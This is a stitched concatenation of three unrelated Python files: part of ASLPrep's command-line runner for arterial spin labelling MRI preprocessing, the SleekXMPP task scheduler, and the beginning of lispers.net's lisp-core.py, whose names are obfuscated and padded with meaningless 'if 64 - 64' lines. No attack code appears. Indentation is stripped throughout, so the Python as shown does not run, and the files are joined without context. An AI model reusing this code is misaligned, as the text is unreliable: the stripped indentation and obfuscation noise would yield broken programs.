g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', nargs='?', const='91k', default=False,
choices=('91k', '170k'), type=str,
help='output preprocessed BOLD as a CIFTI dense timeseries. '
'Optionally, the number of grayordinate can be specified '
'(default is 91k, which equates to 2mm resolution)')
g_surfs_xor.add_argument('--fs-no-reconall',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store', type=Path, default=Path('work'),
help='path where intermediate results should be stored')
g_other.add_argument('--clean-workdir', action='store_true', default=False,
help='Clears working directory of contents. Use of this flag is not'
'recommended when running concurrent processes of ASLPrep.')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the ASLPREP developers. This information helps to '
'improve ASLPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
g_other.add_argument('--pcasl', action='store_true', default=True,
help='PCASL or PASL, if not the CBF computation will assume PASL \
it is also secified in ASL metadata')
#latest = check_latest()
#if latest is not None and currentv < latest:
return parser
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..utils.bids import write_derivative_description, validate_input_dir
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
cgroup = Path('/proc/1/cgroup')
if cgroup.exists() and 'docker' in cgroup.read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'aslprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup(opts, exec_env)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME')) / 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or Path(os.getenv('FS_LICENSE', default_license))
if not license_file.exists():
raise RuntimeError("""\
ERROR: a valid license file is required for FreeSurfer to run. ASLPrep looked for an existing \
license file at several paths, in this order: 1) command line argument ``--fs-license-file``; \
2) ``$FS_LICENSE`` environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. Get it \
(for free) by registering at https://surfer.nmr.mgh.harvard.edu/registration.html""")
os.environ['FS_LICENSE'] = str(license_file.resolve())
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
logger.addHandler(logging.StreamHandler())
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
retcode = p.exitcode or retval.get('return_code', 0)
bids_dir = Path(retval.get('bids_dir'))
output_dir = Path(retval.get('output_dir'))
work_dir = Path(retval.get('work_dir'))
plugin_settings = retval.get('plugin_settings', None)
subject_list = retval.get('subject_list', None)
aslprep_wf = retval.get('workflow', None)
run_uuid = retval.get('run_uuid', None)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
if aslprep_wf and opts.write_graph:
aslprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or int(aslprep_wf is None)
if retcode != 0:
sys.exit(retcode)
# Check workflow for missing commands
missing = check_deps(aslprep_wf)
if missing:
print("Cannot run ASLPrep. Missing dependencies:", file=sys.stderr)
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if not opts.notrack:
from ..utils.sentry import start_ping
start_ping(run_uuid, len(subject_list))
errno = 1 # Default is error exit unless otherwise set
try:
aslprep_wf.run(**plugin_settings)
except Exception as e:
if not opts.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [output_dir / 'aslprep' / 'sub-{}'.format(s) / 'log' / run_uuid
for s in subject_list]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob('crash*.*'):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
logger.critical('ASLPrep failed: %s', e)
raise
else:
if opts.run_reconall:
from templateflow import api
from ..niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(output_dir / 'aslprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(output_dir / 'aslprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
logger.log(25, 'ASLPrep finished without errors')
if not opts.notrack:
sentry_sdk.capture_message('ASLPrep finished without errors',
level='info')
finally:
from ..niworkflows.reports import generate_reports
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from shutil import copyfile
citation_files = {
ext: output_dir / 'aslprep' / 'logs' / ('CITATION.%s' % ext)
for ext in ('bib', 'tex', 'md', 'html')
}
if not opts.md_only_boilerplate and citation_files['md'].exists():
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('aslprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
'--metadata', 'pagetitle="ASLPrep citation boilerplate"',
str(citation_files['md']),
'-o', str(citation_files['html'])]
logger.info('Generating an HTML version of the citation boilerplate...')
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('aslprep', 'data/boilerplate.bib'),
'--natbib', str(citation_files['md']),
'-o', str(citation_files['tex'])]
logger.info('Generating a LaTeX version of the citation boilerplate...')
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('aslprep', 'data/boilerplate.bib'),
citation_files['bib'])
else:
logger.warning('ASLPrep could not find the markdown version of '
'the citation boilerplate (%s). HTML and LaTeX versions'
' of it will not be available', citation_files['md'])
# Generate reports phase
failed_reports = generate_reports(
subject_list, output_dir, work_dir, run_uuid,
config=pkgrf('aslprep', 'data/reports-spec.yml'),
packagename='aslprep')
write_derivative_description(bids_dir, output_dir / 'aslprep')
if failed_reports and not opts.notrack:
sentry_sdk.capture_message(
'Report generation failed for %d subjects' % failed_reports,
level='error')
sys.exit(int((errno + failed_reports) > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows aslprep to enforce
a hard-limited memory-scope.
"""
from ..pybids import BIDSLayout
from nipype import logging as nlogging, config as ncfg
from ..niworkflows.utils.bids import collect_participants, check_pipeline_version
from ..niworkflows.reports import generate_reports
from ..__about__ import __version__
from ..workflows.base import init_aslprep_wf
build_log = nlogging.getLogger('nipype.workflow')
INIT_MSG = """
Running ASLPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
{spaces}
""".format
bids_dir = opts.bids_dir.resolve()
output_dir = opts.output_dir.resolve()
work_dir = opts.work_dir.resolve()
bids_filters = json.loads(opts.bids_filter_file.read_text()) if opts.bids_filter_file else None
if opts.clean_workdir:
from ..niworkflows.utils.misc import clean_directory
build_log.info("Clearing previous ASLPrep working directory: %s" % work_dir)
if not clean_directory(work_dir):
build_log.warning("Could not clear all contents of working directory: %s" % work_dir)
retval['return_code'] = 1
retval['workflow'] = None
retval['bids_dir'] = str(bids_dir)
retval['output_dir'] = str(output_dir)
retval['work_dir'] = str(work_dir)
if output_dir == bids_dir:
build_log.error(
'The selected output folder is the same as the input BIDS folder. '
'Please modify the output path (suggestion: %s).',
bids_dir / 'derivatives' / ('aslprep-%s' % __version__.split('+')[0]))
retval['return_code'] = 1
return retval
# warn if older results exist
msg = check_pipeline_version(
__version__, output_dir / 'aslprep' / 'dataset_description.json'
)
if msg is not None:
build_log.warning(msg)
if bids_dir in work_dir.parents:
build_log.error(
'The selected working directory is a subdirectory of the input BIDS folder. '
'Please modify the output path.')
retval['return_code'] = 1
return retval
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
retval['run_uuid'] = run_uuid
# First check that bids_dir looks like a BIDS folder
layout = BIDSLayout(str(bids_dir), validate=False,
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
subject_list = collect_participants(
layout, participant_label=opts.participant_label)
retval['subject_list'] = subject_list
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
build_log.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
retval['plugin_settings'] = plugin_settings
# Set up directories
log_dir = output_dir / 'aslprep' / 'logs'
# Check and create output and working directories
output_dir.mkdir(exist_ok=True, parents=True)
log_dir.mkdir(exist_ok=True, parents=True)
work_dir.mkdir(exist_ok=True, parents=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': str(log_dir),
'log_to_file': True
},
'execution': {
'crashdump_dir': str(log_dir),
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
# Called with reports only
if opts.reports_only:
from pkg_resources import resource_filename as pkgrf
build_log.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['run_uuid'] = run_uuid
retval['return_code'] = generate_reports(
subject_list, output_dir, work_dir, run_uuid,
config=pkgrf('aslprep', 'data/reports-spec.yml'),
packagename='aslprep')
return retval
# Build main workflow
build_log.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid,
spaces=opts.output_spaces)
)
retval['workflow'] = init_aslprep_wf(
anat_only=opts.anat_only,
#aroma_melodic_dim=opts.aroma_melodic_dimensionality,
bold2t1w_dof=opts.bold2t1w_dof,
cifti_output=opts.cifti_output,
debug=opts.sloppy,
dummy_scans=opts.dummy_scans,
echo_idx=opts.echo_idx,
#err_on_aroma_warn=opts.error_on_aroma_warnings,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
force_syn=opts.force_syn,
freesurfer=opts.run_reconall,
fs_subjects_dir=opts.fs_subjects_dir,
hires=opts.hires,
ignore=opts.ignore,
layout=layout,
longitudinal=opts.longitudinal,
low_mem=opts.low_mem,
medial_surface_nan=opts.medial_surface_nan,
omp_nthreads=omp_nthreads,
output_dir=str(output_dir),
run_uuid=run_uuid,
#regressors_all_comps=opts.return_all_components,
#regressors_fd_th=opts.fd_spike_threshold,
#regressors_dvars_th=opts.dvars_spike_threshold,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
skull_strip_template=opts.skull_strip_template[0],
spaces=parse_spaces(opts),
subject_list=subject_list,
t2s_coreg=opts.t2s_coreg,
task_id=opts.task_id,
#use_aroma=opts.use_aroma,
use_bbr=opts.use_bbr,
use_syn=opts.use_syn_sdc,
work_dir=str(work_dir),
pcasl=opts.pcasl,
bids_filters=bids_filters,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'aslprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
if boilerplate:
citation_files = {
ext: logs_path / ('CITATION.%s' % ext)
for ext in ('bib', 'tex', 'md', 'html')
}
# To please git-annex users and also to guarantee consistency
# among different renderings of the same file, first remove any
# existing one
for citation_file in citation_files.values():
try:
citation_file.unlink()
except FileNotFoundError:
pass
citation_files['md'].write_text(boilerplate)
build_log.log(25, 'Works derived from this ASLPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
return retval
def parse_spaces(opts):
"""
Ensure user-defined spatial references for outputs are correctly parsed.
Certain options require normalization to a space not explicitly defined by users.
These spaces will not be included in the final outputs.
"""
spaces = opts.output_spaces
if not spaces.references and not spaces.is_cached():
spaces.add('MNI152NLin2009cAsym')
if not spaces.is_cached(): # spaces may be already checkpointed if users want no BOLD outputs
spaces.checkpoint()
#if opts.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
# spaces.add(('MNI152NLin6Asym', {'res': '2'}))
if opts.cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = '2' if opts.cifti_output == '91k' else '1'
spaces.add(('fsaverage', {'den': '164k'}))
spaces.add(('MNI152NLin6Asym', {'res': vol_res}))
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add("MNI152NLin2009cAsym")
return spaces
if __name__ == '__main__':
raise RuntimeError("aslprep/cli/run.py should not be run directly;\n"
"Please `pip install` aslprep and use the `aslprep` command")
|
scheduler.py | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import time
import threading
import logging
try:
import queue
except ImportError:
import Queue as queue
log = logging.getLogger(__name__)
class Task(object):
"""
A scheduled task that will be executed by the scheduler
after a given time interval has passed.
Attributes:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
Methods:
run -- Either queue or execute the callback.
reset -- Reset the task's timer.
"""
def __init__(self, name, seconds, callback, args=None,
kwargs=None, repeat=False, qpointer=None):
"""
Create a new task.
Arguments:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
"""
self.name = name
self.seconds = seconds
self.callback = callback
self.args = args or tuple()
self.kwargs = kwargs or {}
self.repeat = repeat
self.next = time.time() + self.seconds
self.qpointer = qpointer
def run(self):
"""
Execute the task's callback.
If an event queue was supplied, place the callback in the queue;
otherwise, execute the callback immediately.
"""
if self.qpointer is not None:
self.qpointer.put(('schedule', self.callback,
self.args, self.name))
else:
self.callback(*self.args, **self.kwargs)
self.reset()
return self.repeat
def reset(self):
"""
Reset the task's timer so that it will repeat.
"""
self.next = time.time() + self.seconds
class Scheduler(object):
"""
A threaded scheduler that allows for updates mid-execution unlike the
scheduler in the standard library.
http://docs.python.org/library/sched.html#module-sched
Attributes:
addq -- A queue storing added tasks.
schedule -- A list of tasks in order of execution times.
thread -- If threaded, the thread processing the schedule.
run -- Indicates if the scheduler is running.
stop -- Threading event indicating if the main process
has been stopped.
Methods:
add -- Add a new task to the schedule.
process -- Process and schedule tasks.
quit -- Stop the scheduler.
"""
def __init__(self, parentstop=None):
"""
Create a new scheduler.
Arguments:
parentstop -- A threading event indicating if the main process has
been stopped.
"""
self.addq = queue.Queue()
self.schedule = []
self.thread = None
self.run = False
self.stop = parentstop
self.schedule_lock = threading.RLock()
def process(self, threaded=True):
"""
Begin accepting and processing scheduled tasks.
Arguments:
threaded -- Indicates if the scheduler should execute in its own
thread. Defaults to True.
"""
if threaded:
self.thread = threading.Thread(name='sheduler_process',
target=self._process)
self.thread.daemon = True
self.thread.start()
else:
self._process()
def _process(self):
"""Process scheduled tasks."""
self.run = True
try:
while self.run and not self.stop.isSet():
wait = 1
updated = False
if self.schedule:
wait = self.schedule[0].next - time.time()
try:
if wait <= 0.0:
newtask = self.addq.get(False)
else:
if wait >= 3.0:
wait = 3.0
newtask = self.addq.get(True, wait)
except queue.Empty:
cleanup = []
self.schedule_lock.acquire()
for task in self.schedule:
if time.time() >= task.next:
updated = True
if not task.run():
cleanup.append(task)
else:
break
for task in cleanup:
x = self.schedule.pop(self.schedule.index(task))
else:
updated = True
self.schedule_lock.acquire()
self.schedule.append(newtask)
finally:
if updated:
self.schedule = sorted(self.schedule,
key=lambda task: task.next)
self.schedule_lock.release()
except KeyboardInterrupt:
self.run = False
except SystemExit:
self.run = False
log.debug("Quitting Scheduler thread")
def add(self, name, seconds, callback, args=None,
kwargs=None, repeat=False, qpointer=None):
"""
Schedule a new task.
Arguments:
name -- The name of the task.
seconds -- The number of seconds to wait before executing.
callback -- The function to execute.
args -- The arguments to pass to the callback.
kwargs -- The keyword arguments to pass to the callback.
repeat -- Indicates if the task should repeat.
Defaults to False.
qpointer -- A pointer to an event queue for queuing callback
execution instead of executing immediately.
"""
try:
self.schedule_lock.acquire()
for task in self.schedule:
if task.name == name:
raise ValueError("Key %s already exists" % name)
self.addq.put(Task(name, seconds, callback, args,
kwargs, repeat, qpointer))
except:
raise
finally:
self.schedule_lock.release()
def remove(self, name):
"""
Remove a scheduled task ahead of schedule, and without
executing it.
Arguments:
name -- The name of the task to remove.
"""
try:
self.schedule_lock.acquire()
the_task = None
for task in self.schedule:
if task.name == name:
the_task = task
if the_task is not None:
self.schedule.remove(the_task)
except:
raise
finally:
self.schedule_lock.release()
def quit(self):
"""Shutdown the scheduler."""
self.run = False
|
lisp-core.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-core.py
#
# This is the core process that is used to demux to the specific LISP
# functional components. The 4342 listen socket is centralized here.
#
#
# +------------- data encapsulation via network --------------+
# | |
# | IPC when mr & ms colocated |
# | +--------------------------------+ |
# | | | |
# | | IPC when mr & ddt colo | |
# | | +------------+ | |
# | | | | | |
# | | | v v v 4341
# +-------------+ +----------+ +----------+ +----------+ +----------+
# | lisp-[ir]tr | | lisp-mr | | lisp-ddt | | lisp-ms | | lisp-etr |
# +-------------+ +----------+ +----------+ +----------+ +----------+
# ^ IPC ^ IPC ^ IPC ^ IPC ^ IPC
# | | | | |
# | | | | |
# | | | | |
# +--------------+--------------+--------------+--------------+
# |
# | for dispatching control messages
# +-----------+
# | lisp-core |
# +-----------+
# | 4342
# |
# via network
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import multiprocessing
import threading
import commands
import time
import os
import bottle
import json
import sys
import socket
import thread
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
try :
from cherrypy . wsgiserver import CherryPyWSGIServer as wsgi_server
from cherrypy . wsgiserver . ssl_pyopenssl import pyOpenSSLAdapter as ssl_adaptor
except :
from cheroot . wsgi import Server as wsgi_server
from cheroot . ssl . builtin import BuiltinSSLAdapter as ssl_adaptor
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
if 68 - 68: Ii1I / O0
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
Oo0oO0ooo = ""
if 56 - 56: I11i - i1IIi
o00oOoo = None
O0OOo = None
II1Iiii1111i = None
i1IIi11111i = [ None , None , None ]
o000o0o00o0Oo = None
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
if 55 - 55: II111iiii
@ bottle . route ( '/lisp/api' , method = "get" )
@ bottle . route ( '/lisp/api/<command>' , method = "get" )
@ bottle . route ( '/lisp/api/<command>/<data_structure>' , method = "get" )
def IIIiI11ii ( command = "" , data_structure = "" ) :
O000oo = [ { "?" : [ { "?" : "not-auth" } ] } ]
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if ( bottle . request . auth != None ) :
O0O00Ooo , OOoooooO = bottle . request . auth
if ( lispconfig . lisp_find_user_account ( O0O00Ooo , OOoooooO ) == False ) :
return ( json . dumps ( O000oo ) )
if 14 - 14: I11i % O0
else :
if ( bottle . request . headers [ "User-Agent" ] . find ( "python" ) != - 1 ) :
return ( json . dumps ( O000oo ) )
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( json . dumps ( O000oo ) )
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
if 77 - 77: I11i - iIii1I11I1II1
if ( command == "data" and data_structure != "" ) :
Ooo = bottle . request . body . readline ( )
O000oo = json . loads ( Ooo ) if Ooo != "" else ""
if ( O000oo != "" ) : O000oo = O000oo . values ( ) [ 0 ]
if ( O000oo == [ ] ) : O000oo = ""
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if ( type ( O000oo ) == dict and type ( O000oo . values ( ) [ 0 ] ) == dict ) :
O000oo = O000oo . values ( ) [ 0 ]
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
O000oo = OO00o0OOO0 ( data_structure , O000oo )
return ( O000oo )
if 27 - 27: O0 % i1IIi * oO0o + i11iIiiIii + OoooooooOO * i1IIi
if 80 - 80: I11i * i11iIiiIii / I1Ii111
if 9 - 9: Ii1I + oO0o % Ii1I + i1IIi . OOooOOo
if 31 - 31: o0oOOo0O0Ooo + I11i + I11i / II111iiii
if 26 - 26: OoooooooOO
if ( command != "" ) :
command = "lisp " + command
else :
Ooo = bottle . request . body . readline ( )
if ( Ooo == "" ) :
O000oo = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( O000oo ) )
if 12 - 12: OoooooooOO % OoOoOO00 / ooOoO0o % o0oOOo0O0Ooo
if 29 - 29: OoooooooOO
O000oo = json . loads ( Ooo )
command = O000oo . keys ( ) [ 0 ]
if 23 - 23: o0oOOo0O0Ooo . II111iiii
if 98 - 98: iIii1I11I1II1 % OoOoOO00 * I1ii11iIi11i * OoOoOO00
O000oo = lispconfig . lisp_get_clause_for_api ( command )
return ( json . dumps ( O000oo ) )
if 45 - 45: I1Ii111 . OoOoOO00
if 83 - 83: oO0o . iIii1I11I1II1 . I1ii11iIi11i
if 31 - 31: Ii1I . Ii1I - o0oOOo0O0Ooo / OoO0O00 + ooOoO0o * I1IiiI
if 63 - 63: I1Ii111 % i1IIi / OoooooooOO - OoooooooOO
if 8 - 8: OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( ) :
O000oo = { }
O000oo [ "hostname" ] = socket . gethostname ( )
O000oo [ "system-uptime" ] = commands . getoutput ( "uptime" )
O000oo [ "lisp-uptime" ] = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
O000oo [ "lisp-version" ] = lisp . lisp_version
if 57 - 57: OOooOOo . OOooOOo
OooOooo = "yes" if os . path . exists ( "./logs/lisp-traceback.log" ) else "no"
O000oo [ "traceback-log" ] = OooOooo
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
OoOo00o = lisp . lisp_myrlocs [ 0 ]
o0OOoo0OO0OOO = lisp . lisp_myrlocs [ 1 ]
OoOo00o = "none" if ( OoOo00o == None ) else OoOo00o . print_address_no_iid ( )
o0OOoo0OO0OOO = "none" if ( o0OOoo0OO0OOO == None ) else o0OOoo0OO0OOO . print_address_no_iid ( )
O000oo [ "lisp-rlocs" ] = [ OoOo00o , o0OOoo0OO0OOO ]
return ( json . dumps ( O000oo ) )
if 19 - 19: oO0o % i1IIi % o0oOOo0O0Ooo
if 93 - 93: iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
if 58 - 58: i11iIiiIii % I11i
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
def OO00o0OOO0 ( data_structure , data ) :
iII1 = [ "site-cache" , "map-cache" , "system" , "map-resolver" ,
"map-server" , "database-mapping" , "site-cache-summary" ]
if 30 - 30: II111iiii - OOooOOo - i11iIiiIii % OoOoOO00 - II111iiii * Ii1I
if ( data_structure not in iII1 ) : return ( json . dumps ( [ ] ) )
if 61 - 61: oO0o - I11i % OOooOOo
if 84 - 84: oO0o * OoO0O00 / I11i - O0
if 30 - 30: iIii1I11I1II1 / ooOoO0o - I1Ii111 - II111iiii % iII111i
if 49 - 49: I1IiiI % ooOoO0o . ooOoO0o . I11i * ooOoO0o
if ( data_structure == "system" ) : return ( oo0 ( ) )
if 97 - 97: Ii1I + o0oOOo0O0Ooo . OOooOOo + I1ii11iIi11i % iII111i
if 95 - 95: i1IIi
if 3 - 3: I1Ii111 - O0 / I1Ii111 % OoO0O00 / I1Ii111 . I1IiiI
if 50 - 50: IiII
if ( data != "" ) : data = json . dumps ( data )
i11I1iIiII = lisp . lisp_api_ipc ( "lisp-core" , data_structure + "%" + data )
if 96 - 96: Oo0Ooo
if ( data_structure in [ "map-cache" , "map-resolver" ] ) :
if ( lisp . lisp_is_running ( "lisp-rtr" ) ) :
lisp . lisp_ipc_lock . acquire ( )
lisp . lisp_ipc ( i11I1iIiII , O0OOo , "lisp-rtr" )
